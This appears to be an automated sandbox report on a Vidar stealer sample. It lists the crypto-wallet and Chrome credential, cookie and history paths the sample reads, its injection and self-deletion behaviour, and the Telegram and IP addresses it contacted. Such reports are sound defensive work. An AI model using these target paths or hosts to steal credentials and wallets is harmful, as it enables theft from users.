Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectronCash
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: JaxxLiberty
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: info.seco
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorage5
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
Source: file.exe String found in binary or memory: Exodus Web3 Wallet
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default_wallet
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Ethereum"
Source: file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorage5
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MultiDoge
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 5896, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Vidar stealer
Source: Yara match File source: 1.3.file.exe.526a20.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.file.exe.526a20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.7fb280.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.7fb280.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.231893309.000000000079A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.232045586.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 5896, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 756295 Sample: file.exe Startdate: 30/11/2022 Architecture: WINDOWS Score: 96 37 Malicious sample detected (through community Yara rule) 2->37 39 Multi AV Scanner detection for submitted file 2->39 41 Yara detected Vidar stealer 2->41 43 3 other signatures 2->43 9 file.exe 2->9         started        process3 signatures4 45 Self deletion via cmd or bat file 9->45 12 file.exe 9->12         started        process5 signatures6 47 Injects a PE file into a foreign processes 12->47 15 file.exe 19 12->15         started        process7 dnsIp8 25 t.me 149.154.167.99, 443, 49707 TELEGRAMRU United Kingdom 15->25 27 88.198.94.71, 49708, 80 HETZNER-ASDE Germany 15->27 29 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->29 31 Self deletion via cmd or bat file 15->31 33 Tries to harvest and steal browser information (history, passwords, etc) 15->33 35 Tries to steal Crypto Currency Wallets 15->35 19 cmd.exe 1 15->19         started        signatures9 process10 process11 21 conhost.exe 19->21         started        23 timeout.exe 1 19->23         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
88.198.94.71
 unknown Germany
24940 HETZNER-ASDE false
149.154.167.99
 t.me United Kingdom
62041 TELEGRAMRU false

Contacted Domains

Name IP Active
t.me 149.154.167.99 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://88.198.94.71/1148 false
  • 4%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
https://t.me/asifrazatg false
    		high
    http://88.198.94.71/ false
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    		 unknown
    http://88.198.94.71/233910279258.zip false
    • Avira URL Cloud: safe
    		 unknown